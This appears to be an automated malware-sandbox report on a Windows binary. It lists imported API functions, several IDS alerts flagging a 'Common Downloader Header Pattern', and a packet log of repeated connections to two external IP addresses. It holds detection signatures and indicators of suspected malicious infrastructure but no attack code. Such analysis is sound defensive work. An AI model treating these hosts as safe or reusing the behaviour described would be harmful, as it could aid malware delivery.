Imports (DLL: imported functions)

WSOCK32.dll: __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv

VERSION.dll: VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW

WINMM.dll: timeGetTime, waveOutSetVolume, mciSendStringW

COMCTL32.dll: ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy

MPR.dll: WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW

WININET.dll: InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable

PSAPI.DLL: EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules

USERENV.dll: CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW

KERNEL32.dll: HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA

USER32.dll: GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW,
DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                              GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                              ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                              ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                              OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-09T14:45:15.644619+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.12 | 49711 | 193.122.6.168 | 80 | TCP
2024-10-09T14:45:16.566496+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.12 | 49711 | 193.122.6.168 | 80 | TCP
2024-10-09T14:45:17.147222+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.12 | 49713 | 188.114.96.3 | 443 | TCP
2024-10-09T14:45:17.798405+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.12 | 49714 | 193.122.6.168 | 80 | TCP
2024-10-09T14:45:19.102713+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.12 | 49715 | 188.114.96.3 | 443 | TCP
2024-10-09T14:45:23.944483+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.12 | 49722 | 188.114.96.3 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 9, 2024 14:45:13.872833014 CEST | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:13.877954960 CEST | 80 | 49711 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:13.878035069 CEST | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:13.878197908 CEST | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:13.883074999 CEST | 80 | 49711 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:15.409717083 CEST | 80 | 49711 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:15.410913944 CEST | 80 | 49711 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:15.411158085 CEST | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:15.412327051 CEST | 80 | 49711 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:15.412369013 CEST | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:15.413544893 CEST | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:15.414058924 CEST | 80 | 49711 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:15.414105892 CEST | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:15.420595884 CEST | 80 | 49711 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:15.602896929 CEST | 80 | 49711 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:15.644618988 CEST | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:15.649770975 CEST | 49712 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:15.649800062 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:15.649960995 CEST | 49712 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:15.657625914 CEST | 49712 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:15.657634974 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:16.138748884 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:16.138959885 CEST | 49712 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:16.143142939 CEST | 49712 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:16.143151045 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:16.143568039 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:16.191471100 CEST | 49712 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:16.202811003 CEST | 49712 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:16.243407011 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:16.318244934 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:16.318308115 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:16.318351984 CEST | 49712 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:16.323987007 CEST | 49712 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:16.327049017 CEST | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:16.331885099 CEST | 80 | 49711 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:16.514153957 CEST | 80 | 49711 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:16.518347025 CEST | 49713 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:16.518387079 CEST | 443 | 49713 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:16.518496990 CEST | 49713 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:16.519412994 CEST | 49713 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:16.519431114 CEST | 443 | 49713 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:16.566495895 CEST | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:16.986603022 CEST | 443 | 49713 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:16.988883018 CEST | 49713 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:16.988919020 CEST | 443 | 49713 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:17.147228956 CEST | 443 | 49713 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:17.147314072 CEST | 443 | 49713 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:17.147391081 CEST | 49713 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:17.148200035 CEST | 49713 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:17.152175903 CEST | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:17.153493881 CEST | 49714 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:17.159152985 CEST | 80 | 49711 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:17.159209967 CEST | 49711 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:17.159872055 CEST | 80 | 49714 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:17.159934044 CEST | 49714 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:17.160048008 CEST | 49714 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:17.166389942 CEST | 80 | 49714 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:17.787153006 CEST | 80 | 49714 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:17.798404932 CEST | 49714 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:17.799313068 CEST | 49715 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:17.799345016 CEST | 443 | 49715 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:17.799416065 CEST | 49715 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:17.799729109 CEST | 49715 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:17.799741030 CEST | 443 | 49715 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:17.803636074 CEST | 80 | 49714 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:17.803679943 CEST | 49714 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:18.931651115 CEST | 443 | 49715 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:18.933991909 CEST | 49715 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:18.934012890 CEST | 443 | 49715 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:19.102739096 CEST | 443 | 49715 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:19.102864981 CEST | 443 | 49715 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:19.102915049 CEST | 49715 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:19.103457928 CEST | 49715 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:19.108974934 CEST | 49716 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:19.114077091 CEST | 80 | 49716 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:19.114185095 CEST | 49716 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:19.115308046 CEST | 49716 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:19.122852087 CEST | 80 | 49716 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:19.741142988 CEST | 80 | 49716 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:19.742908001 CEST | 49717 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:19.742937088 CEST | 443 | 49717 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:19.743032932 CEST | 49717 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:19.743408918 CEST | 49717 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:19.743423939 CEST | 443 | 49717 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:19.785259962 CEST | 49716 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:21.024074078 CEST | 443 | 49717 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:21.026021957 CEST | 49717 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:21.026038885 CEST | 443 | 49717 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:21.410423040 CEST | 443 | 49717 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:21.411019087 CEST | 443 | 49717 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:21.411082983 CEST | 49717 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:21.411465883 CEST | 49717 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:21.414938927 CEST | 49716 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:21.416062117 CEST | 49718 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:21.420272112 CEST | 80 | 49716 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:21.420346022 CEST | 49716 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:21.420851946 CEST | 80 | 49718 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:21.420923948 CEST | 49718 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:21.421016932 CEST | 49718 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:21.425878048 CEST | 80 | 49718 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:22.046936035 CEST | 80 | 49718 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:22.048218012 CEST | 49720 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:22.048233032 CEST | 443 | 49720 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:22.048769951 CEST | 49720 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:22.049060106 CEST | 49720 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:22.049071074 CEST | 443 | 49720 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:22.097760916 CEST | 49718 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:22.530431032 CEST | 443 | 49720 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:22.532004118 CEST | 49720 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:22.532040119 CEST | 443 | 49720 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:22.681343079 CEST | 443 | 49720 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:22.681566000 CEST | 443 | 49720 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:22.681685925 CEST | 49720 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:22.682172060 CEST | 49720 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:22.685039043 CEST | 49718 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:22.686273098 CEST | 49721 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:22.690510988 CEST | 80 | 49718 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:22.690594912 CEST | 49718 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:22.691222906 CEST | 80 | 49721 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:22.691299915 CEST | 49721 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:22.691395998 CEST | 49721 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:22.696265936 CEST | 80 | 49721 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:23.316754103 CEST | 80 | 49721 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:23.319276094 CEST | 49722 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:23.319319010 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:23.319380045 CEST | 49722 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:23.319869995 CEST | 49722 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:23.319885969 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:23.363363028 CEST | 49721 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:23.805131912 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:23.806915998 CEST | 49722 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:23.806943893 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:23.944570065 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:23.944691896 CEST | 443 | 49722 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:23.944820881 CEST | 49722 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:23.945416927 CEST | 49722 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:23.975109100 CEST | 49721 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:23.975601912 CEST | 49723 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:23.980508089 CEST | 80 | 49723 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:23.980741024 CEST | 80 | 49721 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:23.980846882 CEST | 49723 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:23.980848074 CEST | 49721 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:23.980896950 CEST | 49723 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:23.985769987 CEST | 80 | 49723 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:24.627980947 CEST | 80 | 49723 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:24.629554033 CEST | 49724 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:24.629590034 CEST | 443 | 49724 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:24.629878044 CEST | 49724 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:24.629904985 CEST | 49724 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:24.629909039 CEST | 443 | 49724 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:24.675929070 CEST | 49723 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:25.100774050 CEST | 443 | 49724 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:25.102475882 CEST | 49724 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:25.102499008 CEST | 443 | 49724 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:25.249043941 CEST | 443 | 49724 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:25.249280930 CEST | 443 | 49724 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:25.249340057 CEST | 49724 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:25.250076056 CEST | 49724 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:25.253417969 CEST | 49723 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:25.254568100 CEST | 49726 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:25.259499073 CEST | 80 | 49723 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:25.259565115 CEST | 49723 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:25.260159016 CEST | 80 | 49726 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:25.260235071 CEST | 49726 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:25.260351896 CEST | 49726 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:25.266294003 CEST | 80 | 49726 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:25.887968063 CEST | 80 | 49726 | 193.122.6.168 | 192.168.2.12
Oct 9, 2024 14:45:25.889184952 CEST | 49729 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:25.889224052 CEST | 443 | 49729 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:25.889380932 CEST | 49729 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:25.889624119 CEST | 49729 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:25.889637947 CEST | 443 | 49729 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:25.941515923 CEST | 49726 | 80 | 192.168.2.12 | 193.122.6.168
Oct 9, 2024 14:45:26.349617004 CEST | 443 | 49729 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:26.351357937 CEST | 49729 | 443 | 192.168.2.12 | 188.114.96.3
Oct 9, 2024 14:45:26.351403952 CEST | 443 | 49729 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:26.486605883 CEST | 443 | 49729 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:26.486706018 CEST | 443 | 49729 | 188.114.96.3 | 192.168.2.12
Oct 9, 2024 14:45:26.486792088 CEST | 49729 | 443 | 192.168.2.12 | 188.114.96.3
                                                                              Oct 9, 2024 14:45:26.487353086 CEST49729443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:26.490365982 CEST4972680192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:26.491432905 CEST4973180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:26.496484041 CEST8049731193.122.6.168192.168.2.12
